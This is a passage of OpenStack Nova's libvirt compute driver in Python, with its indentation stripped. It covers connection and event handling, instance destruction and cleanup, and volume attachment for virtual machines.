We perform a monkey patch to replace those two instance methods.
"""
def str_method(self):
return str(self._obj)
def repr_method(self):
return repr(self._obj)
tpool.Proxy.__str__ = str_method
tpool.Proxy.__repr__ = repr_method
patch_tpool_proxy()
VIR_DOMAIN_NOSTATE = 0
VIR_DOMAIN_RUNNING = 1
VIR_DOMAIN_BLOCKED = 2
VIR_DOMAIN_PAUSED = 3
VIR_DOMAIN_SHUTDOWN = 4
VIR_DOMAIN_SHUTOFF = 5
VIR_DOMAIN_CRASHED = 6
VIR_DOMAIN_PMSUSPENDED = 7
LIBVIRT_POWER_STATE = {
VIR_DOMAIN_NOSTATE: power_state.NOSTATE,
VIR_DOMAIN_RUNNING: power_state.RUNNING,
# NOTE(maoy): The DOMAIN_BLOCKED state is only valid in Xen.
# It means that the VM is running and the vCPU is idle. So,
# we map it to RUNNING
VIR_DOMAIN_BLOCKED: power_state.RUNNING,
VIR_DOMAIN_PAUSED: power_state.PAUSED,
# NOTE(maoy): The libvirt API doc says that DOMAIN_SHUTDOWN
# means the domain is being shut down. So technically the domain
# is still running. SHUTOFF is the real powered off state.
# But we will map both to SHUTDOWN anyway.
# http://libvirt.org/html/libvirt-libvirt.html
VIR_DOMAIN_SHUTDOWN: power_state.SHUTDOWN,
VIR_DOMAIN_SHUTOFF: power_state.SHUTDOWN,
VIR_DOMAIN_CRASHED: power_state.CRASHED,
VIR_DOMAIN_PMSUSPENDED: power_state.SUSPENDED,
}
MIN_LIBVIRT_VERSION = (0, 9, 11)
# When the above version matches/exceeds this version
# delete it & corresponding code using it
MIN_LIBVIRT_DEVICE_CALLBACK_VERSION = (1, 1, 1)
# Live snapshot requirements
REQ_HYPERVISOR_LIVESNAPSHOT = "QEMU"
# TODO(sdague): this should be 1.0.0, but hacked to set 1.3.0 until
# https://bugs.launchpad.net/nova/+bug/1334398
# can be diagnosed & resolved
MIN_LIBVIRT_LIVESNAPSHOT_VERSION = (1, 3, 0)
MIN_QEMU_LIVESNAPSHOT_VERSION = (1, 3, 0)
# block size tuning requirements
MIN_LIBVIRT_BLOCKIO_VERSION = (0, 10, 2)
# BlockJobInfo management requirement
MIN_LIBVIRT_BLOCKJOBINFO_VERSION = (1, 1, 1)
# Relative block commit (feature is detected,
# this version is only used for messaging)
MIN_LIBVIRT_BLOCKCOMMIT_RELATIVE_VERSION = (1, 2, 7)
def libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
class LibvirtDriver(driver.ComputeDriver):
capabilities = {
"has_imagecache": True,
"supports_recreate": True,
}
def __init__(self, virtapi, read_only=False):
super(LibvirtDriver, self).__init__(virtapi)
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._skip_list_all_domains = False
self._host_state = None
self._initiator = None
self._fc_wwnns = None
self._fc_wwpns = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._caps = None
self._vcpu_total = 0
self.read_only = read_only
self.firewall_driver = firewall.load_driver(
DEFAULT_FIREWALL_DRIVER,
self.virtapi,
get_connection=self._get_connection)
self.vif_driver = libvirt_vif.LibvirtGenericVIFDriver(
self._get_connection)
self.volume_drivers = driver.driver_dict_from_config(
CONF.libvirt.volume_drivers, self)
self.dev_filter = pci_whitelist.get_pci_devices_filter()
self._event_queue = None
self._disk_cachemode = None
self.image_cache_manager = imagecache.ImageCacheManager()
self.image_backend = imagebackend.Backend(CONF.use_cow_images)
self.disk_cachemodes = {}
self.valid_cachemodes = ["default",
"none",
"writethrough",
"writeback",
"directsync",
"unsafe",
]
self._conn_supports_start_paused = CONF.libvirt.virt_type in ('kvm',
'qemu')
for mode_str in CONF.libvirt.disk_cachemodes:
disk_type, sep, cache_mode = mode_str.partition('=')
if cache_mode not in self.valid_cachemodes:
LOG.warn(_LW('Invalid cachemode %(cache_mode)s specified '
'for disk type %(disk_type)s.'),
{'cache_mode': cache_mode, 'disk_type': disk_type})
continue
self.disk_cachemodes[disk_type] = cache_mode
self._volume_api = volume.API()
self._image_api = image.API()
sysinfo_serial_funcs = {
'none': lambda: None,
'hardware': self._get_host_sysinfo_serial_hardware,
'os': self._get_host_sysinfo_serial_os,
'auto': self._get_host_sysinfo_serial_auto,
}
self._sysinfo_serial_func = sysinfo_serial_funcs.get(
CONF.libvirt.sysinfo_serial)
if not self._sysinfo_serial_func:
raise exception.NovaException(
_("Unexpected sysinfo_serial setting '%(actual)s'. "
"Permitted values are %(expect)s'") %
{'actual': CONF.libvirt.sysinfo_serial,
'expect': ', '.join("'%s'" % k for k in
sysinfo_serial_funcs.keys())})
@property
def disk_cachemode(self):
if self._disk_cachemode is None:
# We prefer 'none' for consistent performance, host crash
# safety & migration correctness by avoiding host page cache.
# Some filesystems (eg GlusterFS via FUSE) don't support
# O_DIRECT though. For those we fallback to 'writethrough'
# which gives host crash safety, and is safe for migration
# provided the filesystem is cache coherent (cluster filesystems
# typically are, but things like NFS are not).
self._disk_cachemode = "none"
if not self._supports_direct_io(CONF.instances_path):
self._disk_cachemode = "writethrough"
return self._disk_cachemode
@property
def host_state(self):
if not self._host_state:
self._host_state = HostState(self)
return self._host_state
def _set_cache_mode(self, conf):
"""Set cache mode on LibvirtConfigGuestDisk object."""
try:
source_type = conf.source_type
driver_cache = conf.driver_cache
except AttributeError:
return
cache_mode = self.disk_cachemodes.get(source_type,
driver_cache)
conf.driver_cache = cache_mode
@staticmethod
def _conn_has_min_version(conn, lv_ver=None, hv_ver=None, hv_type=None):
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if libvirt_version < utils.convert_version_to_int(lv_ver):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if hypervisor_version < utils.convert_version_to_int(hv_ver):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def _has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._conn_has_min_version(self._conn, lv_ver, hv_ver, hv_type)
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self.queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
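# Translate the libvirt lifecycle event into the corresponding nova
# virtevent transition; event types we do not handle leave transition as
# None and are simply dropped.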
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
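# Lifecycle events are emitted as they are drained from the queue, but
# only the most recent connection-close event is acted upon afterwards.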
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
self.emit_event(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = last_close_event['reason']
_error = _("Connection to libvirt lost: %s") % reason
LOG.warn(_error)
self._wrapped_conn = None
# Disable the compute service to avoid
# new instances being scheduled on this host.
self._set_host_enabled(False, disable_reason=_error)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
event_thread = native_threading.Thread(target=self._native_thread)
event_thread.setDaemon(True)
event_thread.start()
LOG.debug("Starting green dispatch thread")
eventlet.spawn(self._dispatch_thread)
def _do_quality_warnings(self):
"""Warn about untested driver configurations.
This will log a warning message about untested driver or host arch
configurations to indicate to administrators that the quality is
unknown. Currently, only qemu or kvm on intel 32- or 64-bit systems
is tested upstream.
"""
caps = self._get_host_capabilities()
arch = caps.host.cpu.arch
if (CONF.libvirt.virt_type not in ('qemu', 'kvm') or
arch not in ('i686', 'x86_64')):
LOG.warn(_LW('The libvirt driver is not tested on '
'%(type)s/%(arch)s by the OpenStack project and '
'thus its quality can not be ensured. For more '
'information, see: https://wiki.openstack.org/wiki/'
'HypervisorSupportMatrix'),
{'type': CONF.libvirt.virt_type, 'arch': arch})
def init_host(self, host):
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._do_quality_warnings()
# Stop libguestfs using KVM unless we're also configured
# to use this. This solves problem where people need to
# stop Nova use of KVM because nested-virt is broken
if CONF.libvirt.virt_type != "kvm":
guestfs.force_tcg()
if not self._has_min_version(MIN_LIBVIRT_VERSION):
major = MIN_LIBVIRT_VERSION[0]
minor = MIN_LIBVIRT_VERSION[1]
micro = MIN_LIBVIRT_VERSION[2]
LOG.error(_LE('Nova requires libvirt version '
'%(major)i.%(minor)i.%(micro)i or greater.'),
{'major': major, 'minor': minor, 'micro': micro})
self._init_events()
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self.uri())
wrapped_conn = None
try:
wrapped_conn = self._connect(self.uri(), self.read_only)
finally:
# Re-enable the compute service if the connection was successful,
# in case it had previously been disabled.
disable_reason = DISABLE_REASON_UNDEFINED
if not wrapped_conn:
disable_reason = 'Failed to connect to libvirt'
self._set_host_enabled(bool(wrapped_conn), disable_reason)
self._wrapped_conn = wrapped_conn
self._skip_list_all_domains = False
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warn(_LW("URI %(uri)s does not support events: %(error)s"),
{'uri': self.uri(), 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except (TypeError, AttributeError) as e:
# NOTE: The registerCloseCallback of python-libvirt 1.0.1+
# is defined with 3 arguments, and the above registerClose-
# Callback succeeds. However, the one in python-libvirt 1.0.0
# is defined with 4 arguments, so a TypeError is raised here,
# and python-libvirt 0.9 does not define registerCloseCallback
# at all.
LOG.debug("The version of python-libvirt does not support "
"registerCloseCallback or is too old: %s", e)
except libvirt.libvirtError as e:
LOG.warn(_LW("URI %(uri)s does not support connection"
" events: %(error)s"),
{'uri': self.uri(), 'error': e})
return wrapped_conn
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
wrapped_conn = self._wrapped_conn
if not wrapped_conn or not self._test_connection(wrapped_conn):
wrapped_conn = self._get_new_connection()
return wrapped_conn
_conn = property(_get_connection)
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
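# getLibVersion() doubles as a cheap liveness probe; remote/RPC system
# errors mean the connection has dropped and must be re-established.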
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def uri():
if CONF.libvirt.virt_type == 'uml':
uri = CONF.libvirt.connection_uri or 'uml:///system'
elif CONF.libvirt.virt_type == 'xen':
uri = CONF.libvirt.connection_uri or 'xen:///'
elif CONF.libvirt.virt_type == 'lxc':
uri = CONF.libvirt.connection_uri or 'lxc:///'
else:
uri = CONF.libvirt.connection_uri or 'qemu:///system'
return uri
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.NovaException(
_("Can not handle authentication request for %d credentials")
% len(creds))
@staticmethod
def _connect(uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
LibvirtDriver._connect_auth_cb,
None]
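# The credential list above enumerates the prompts libvirt may issue;
# _connect_auth_cb rejects any non-empty request, so only URIs that need
# no interactive authentication can be opened here.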
try:
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
# tpool.proxy_call creates a native thread. Due to limitations
# with eventlet locking we cannot use the logging API inside
# the called function.
return tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
libvirt.openAuth, uri, auth, flags)
except libvirt.libvirtError as ex:
LOG.exception(_LE("Connection to libvirt failed: %s"), ex)
payload = dict(ip=LibvirtDriver.get_host_ip_addr(),
method='_connect',
reason=ex)
rpc.get_notifier('compute').error(nova_context.get_admin_context(),
'compute.libvirt.error',
payload)
raise exception.HypervisorUnavailable(host=CONF.host)
def instance_exists(self, instance):
"""Efficient override of base instance_exists method."""
try:
self._lookup_by_name(instance.name)
return True
except exception.NovaException:
return False
def _list_instance_domains_fast(self, only_running=True):
# The modern (>= 0.9.13) fast way - 1 single API call for all domains
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
return self._conn.listAllDomains(flags)
def _list_instance_domains_slow(self, only_running=True):
# The legacy (< 0.9.13) slow way - O(n) API call for n domains
uuids = []
doms = []
# Redundant numOfDomains check is for libvirt bz #836647
if self._conn.numOfDomains() > 0:
for id in self._conn.listDomainsID():
try:
dom = self._lookup_by_id(id)
doms.append(dom)
uuids.append(dom.UUIDString())
except exception.InstanceNotFound:
continue
if only_running:
return doms
for name in self._conn.listDefinedDomains():
try:
dom = self._lookup_by_name(name)
if dom.UUIDString() not in uuids:
doms.append(dom)
except exception.InstanceNotFound:
continue
return doms
def _list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
if not self._skip_list_all_domains:
try:
alldoms = self._list_instance_domains_fast(only_running)
except (libvirt.libvirtError, AttributeError) as ex:
LOG.info(_LI("Unable to use bulk domain list APIs, "
"falling back to slow code path: %(ex)s"),
{'ex': ex})
self._skip_list_all_domains = True
if self._skip_list_all_domains:
# Old libvirt, or a libvirt driver which doesn't
# implement the new API
alldoms = self._list_instance_domains_slow(only_running)
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def list_instances(self):
names = []
for dom in self._list_instance_domains(only_running=False):
names.append(dom.name())
return names
def list_instance_uuids(self):
uuids = []
for dom in self._list_instance_domains(only_running=False):
uuids.append(dom.UUIDString())
return uuids
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
for vif in network_info:
self.vif_driver.plug(instance, vif)
def _unplug_vifs(self, instance, network_info, ignore_errors):
"""Unplug VIFs from networks."""
for vif in network_info:
try:
self.vif_driver.unplug(instance, vif)
except exception.NovaException:
if not ignore_errors:
raise
def unplug_vifs(self, instance, network_info):
self._unplug_vifs(instance, network_info, False)
def _teardown_container(self, instance):
inst_path = libvirt_utils.get_instance_path(instance)
container_dir = os.path.join(inst_path, 'rootfs')
rootfs_dev = instance.system_metadata.get('rootfs_device_name')
disk.teardown_container(container_dir, rootfs_dev)
def _destroy(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
virt_dom = None
# If the instance is already terminated, we're still happy
# Otherwise, destroy it
old_domid = -1
if virt_dom is not None:
try:
old_domid = virt_dom.ID()
virt_dom.destroy()
# NOTE(GuanQiang): teardown container to avoid resource leak
if CONF.libvirt.virt_type == 'lxc':
self._teardown_container(instance)
except libvirt.libvirtError as e:
is_okay = False
errcode = e.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_INVALID:
# If the instance is already shut off, we get this:
# Code=55 Error=Requested operation is not valid:
# domain is not running
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.SHUTDOWN:
is_okay = True
elif errcode == libvirt.VIR_ERR_OPERATION_TIMEOUT:
LOG.warn(_LW("Cannot destroy instance, operation time "
"out"),
instance=instance)
reason = _("operation time out")
raise exception.InstancePowerOffFailure(reason=reason)
if not is_okay:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error from libvirt during destroy. '
'Code=%(errcode)s Error=%(e)s'),
{'errcode': errcode, 'e': e},
instance=instance)
def _wait_for_destroy(expected_domid):
"""Called at an interval until the VM is gone."""
# NOTE(vish): If the instance disappears during the destroy
# we ignore it so the cleanup can still be
# attempted because we would prefer destroy to
# never fail.
try:
dom_info = self.get_info(instance)
state = dom_info['state']
new_domid = dom_info['id']
except exception.InstanceNotFound:
LOG.warning(_LW("During wait destroy, instance disappeared."),
instance=instance)
raise loopingcall.LoopingCallDone()
if state == power_state.SHUTDOWN:
LOG.info(_LI("Instance destroyed successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
# NOTE(wangpan): If the instance was booted again after destroy,
# this may be an endless loop, so check the id of
# the domain here; if it changed and the instance is
# still running, we should destroy it again.
# see https://bugs.launchpad.net/nova/+bug/1111213 for more details
if new_domid != expected_domid:
LOG.info(_LI("Instance may be started again."),
instance=instance)
kwargs['is_running'] = True
raise loopingcall.LoopingCallDone()
kwargs = {'is_running': False}
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_destroy,
old_domid)
timer.start(interval=0.5).wait()
if kwargs['is_running']:
LOG.info(_LI("Going to destroy instance again."),
instance=instance)
self._destroy(instance)
def destroy(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None):
self._destroy(instance)
self.cleanup(context, instance, network_info, block_device_info,
destroy_disks, migrate_data)
def _undefine_domain(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
virt_dom = None
if virt_dom:
try:
try:
virt_dom.undefineFlags(
libvirt.VIR_DOMAIN_UNDEFINE_MANAGED_SAVE)
except libvirt.libvirtError:
LOG.debug("Error from libvirt during undefineFlags."
" Retrying with undefine", instance=instance)
virt_dom.undefine()
except AttributeError:
# NOTE(vish): Older versions of libvirt don't support
# undefine flags, so attempt to do the
# right thing.
try:
if virt_dom.hasManagedSaveImage(0):
virt_dom.managedSaveRemove(0)
except AttributeError:
pass
virt_dom.undefine()
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
errcode = e.get_error_code()
LOG.error(_LE('Error from libvirt during undefine. '
'Code=%(errcode)s Error=%(e)s'),
{'errcode': errcode, 'e': e}, instance=instance)
def cleanup(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None, destroy_vifs=True):
self._undefine_domain(instance)
if destroy_vifs:
self._unplug_vifs(instance, network_info, True)
retry = True
while retry:
try:
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
except libvirt.libvirtError as e:
try:
state = self.get_info(instance)['state']
except exception.InstanceNotFound:
state = power_state.SHUTDOWN
if state != power_state.SHUTDOWN:
LOG.warn(_LW("Instance may be still running, destroy "
"it again."), instance=instance)
self._destroy(instance)
else:
retry = False
errcode = e.get_error_code()
LOG.exception(_LE('Error from libvirt during unfilter. '
'Code=%(errcode)s Error=%(e)s'),
{'errcode': errcode, 'e': e},
instance=instance)
reason = "Error unfiltering instance."
raise exception.InstanceTerminationFailure(reason=reason)
except Exception:
retry = False
raise
else:
retry = False
# FIXME(wangpan): if the instance is booted again here, e.g. when a
# soft reboot operation boots it here, it will
# become "running deleted"; should we check and destroy
# it at the end of this method?
# NOTE(vish): we disconnect from volumes regardless
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
if ('data' in connection_info and
'volume_id' in connection_info['data']):
volume_id = connection_info['data']['volume_id']
encryption = encryptors.get_encryption_metadata(
context, self._volume_api, volume_id, connection_info)
if encryption:
# The volume must be detached from the VM before
# disconnecting it from its encryptor. Otherwise, the
# encryptor may report that the volume is still in use.
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.detach_volume(**encryption)
try:
self._disconnect_volume(connection_info, disk_dev)
except Exception as exc:
with excutils.save_and_reraise_exception() as ctxt:
if destroy_disks:
# Don't block on Volume errors if we're trying to
# delete the instance as we may be partially created
# or deleted
ctxt.reraise = False
LOG.warn(_LW("Ignoring Volume Error on vol %(vol_id)s "
"during delete %(exc)s"),
{'vol_id': vol.get('volume_id'), 'exc': exc},
instance=instance)
if destroy_disks or (
migrate_data and migrate_data.get('is_shared_block_storage',
False)):
self._delete_instance_files(instance)
if destroy_disks:
self._cleanup_lvm(instance)
# NOTE(haomai): destroy volumes if needed
if CONF.libvirt.images_type == 'rbd':
self._cleanup_rbd(instance)
@staticmethod
def _get_rbd_driver():
return rbd_utils.RBDDriver(
pool=CONF.libvirt.images_rbd_pool,
ceph_conf=CONF.libvirt.images_rbd_ceph_conf,
rbd_user=CONF.libvirt.rbd_user)
def _cleanup_rbd(self, instance):
LibvirtDriver._get_rbd_driver().cleanup_volumes(instance)
def _cleanup_lvm(self, instance):
"""Delete all LVM disks for given instance object."""
disks = self._lvm_disks(instance)
if disks:
lvm.remove_volumes(disks)
def _lvm_disks(self, instance):
"""Returns all LVM disks for given instance object."""
if CONF.libvirt.images_volume_group:
vg = os.path.join('/dev', CONF.libvirt.images_volume_group)
if not os.path.exists(vg):
return []
pattern = '%s_' % instance['uuid']
# TODO(sdague): remove in Juno
def belongs_to_instance_legacy(disk):
# We don't want to leak old disks, but at the same time, we
# don't want to do an unsafe thing. So we will only handle
# the old filter if it's the system default still.
pattern = '%s_' % instance['name']
if disk.startswith(pattern):
if CONF.instance_name_template == 'instance-%08x':
return True
else:
LOG.warn(_LW('Volume %(disk)s possibly unsafe to '
'remove, please clean up manually'),
{'disk': disk})
return False
def belongs_to_instance(disk):
return disk.startswith(pattern)
def fullpath(name):
return os.path.join(vg, name)
logical_volumes = lvm.list_volumes(vg)
disk_names = filter(belongs_to_instance, logical_volumes)
# TODO(sdague): remove in Juno
disk_names.extend(
filter(belongs_to_instance_legacy, logical_volumes)
)
disks = map(fullpath, disk_names)
return disks
return []
def get_volume_connector(self, instance):
if not self._initiator:
self._initiator = libvirt_utils.get_iscsi_initiator()
if not self._initiator:
LOG.debug('Could not determine iscsi initiator name',
instance=instance)
if not self._fc_wwnns:
self._fc_wwnns = libvirt_utils.get_fc_wwnns()
if not self._fc_wwnns or len(self._fc_wwnns) == 0:
LOG.debug('Could not determine fibre channel '
'world wide node names',
instance=instance)
if not self._fc_wwpns:
self._fc_wwpns = libvirt_utils.get_fc_wwpns()
if not self._fc_wwpns or len(self._fc_wwpns) == 0:
LOG.debug('Could not determine fibre channel '
'world wide port names',
instance=instance)
connector = {'ip': CONF.my_ip,
'host': CONF.host}
if self._initiator:
connector['initiator'] = self._initiator
if self._fc_wwnns and self._fc_wwpns:
connector["wwnns"] = self._fc_wwnns
connector["wwpns"] = self._fc_wwpns
return connector
def _cleanup_resize(self, instance, network_info):
# NOTE(wangpan): we get the pre-grizzly instance path first,
# so the backup dir of a pre-grizzly instance can
# be deleted correctly with grizzly or later nova.
pre_grizzly_name = libvirt_utils.get_instance_path(instance,
forceold=True)
target = pre_grizzly_name + '_resize'
if not os.path.exists(target):
target = libvirt_utils.get_instance_path(instance) + '_resize'
if os.path.exists(target):
# Deletion can fail over NFS, so retry the deletion as required.
# Set the maximum number of attempts to 5; in most cases the
# directory is removed on the second attempt.
utils.execute('rm', '-rf', target, delay_on_retry=True,
attempts=5)
if instance['host'] != CONF.host:
self._undefine_domain(instance)
self.unplug_vifs(instance, network_info)
self.firewall_driver.unfilter_instance(instance, network_info)
def _connect_volume(self, connection_info, disk_info):
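# The volume driver is looked up by the connection's driver_volume_type;
# unknown types raise VolumeDriverNotFound.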
driver_type = connection_info.get('driver_volume_type')
if driver_type not in self.volume_drivers:
raise exception.VolumeDriverNotFound(driver_type=driver_type)
driver = self.volume_drivers[driver_type]
return driver.connect_volume(connection_info, disk_info)
def _disconnect_volume(self, connection_info, disk_dev):
driver_type = connection_info.get('driver_volume_type')
if driver_type not in self.volume_drivers:
raise exception.VolumeDriverNotFound(driver_type=driver_type)
driver = self.volume_drivers[driver_type]
return driver.disconnect_volume(connection_info, disk_dev)
def _get_volume_encryptor(self, connection_info, encryption):
encryptor = encryptors.get_volume_encryptor(connection_info,
**encryption)
return encryptor
def attach_volume(self, context, connection_info, instance, mountpoint,
disk_bus=None, device_type=None, encryption=None):
instance_name = instance['name']
virt_dom = self._lookup_by_name(instance_name)
disk_dev = mountpoint.rpartition("/")[2]
bdm = {
'device_name': disk_dev,
'disk_bus': disk_bus,
'device_type': device_type}
# Note(cfb): If the volume has a custom block size, check that
# we are using QEMU/KVM and libvirt >= 0.10.2. The
# presence of a block size is considered mandatory by
# cinder so we fail if we can't honor the request.
data = {}
if ('data' in connection_info):
data = connection_info['data']
if ('logical_block_size' in data or 'physical_block_size' in data):
if ((CONF.libvirt.virt_type != "kvm" and
CONF.libvirt.virt_type != "qemu")):
msg = _("Volume sets block size, but the current "
"libvirt hypervisor '%s' does not support custom "
"block size") % CONF.libvirt.virt_type
raise exception.InvalidHypervisorType(msg)
if not self._has_min_version(MIN_LIBVIRT_BLOCKIO_VERSION):
ver = ".".join([str(x) for x in MIN_LIBVIRT_BLOCKIO_VERSION])
msg = _("Volume sets block size, but libvirt '%s' or later is "
"required.") % ver
raise exception.Invalid(msg)
disk_info = blockinfo.get_info_from_bdm(CONF.libvirt.virt_type, bdm)
conf = self._connect_volume(connection_info, disk_info)
self._set_cache_mode(conf)
try:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state in (power_state.RUNNING, power_state.PAUSED):
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
# cache device_path in connection_info -- required by encryptors
if 'data' in connection_info:
connection_info['data']['device_path'] = conf.source_path
if encryption:
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.attach_volume(context, **encryption)
virt_dom.attachDeviceFlags(conf.to_xml(), flags)
except Exception as ex:
if isinstance(ex, libvirt.libvirtError):
errcode = ex.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_FAILED:
self._disconnect_volume(connection_info, disk_dev)
raise exception.DeviceIsBusy(device=disk_dev)
with excutils.save_and_reraise_exception():
self._disconnect_volume(connection_info, disk_dev)
def _swap_volume(self, domain, disk_path, new_path, resize_to):
"""Swap existing disk with a new block device."""
# Save a copy of the domain's persistent XML file
xml = domain.XMLDesc(
libvirt.VIR_DOMAIN_XML_INACTIVE |
libvirt.VIR_DOMAIN_XML_SECURE)
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended.
try:
domain.blockJobAbort(disk_path, 0)
except Exception:
pass
try:
# NOTE (rmk): blockRebase cannot be executed on persistent
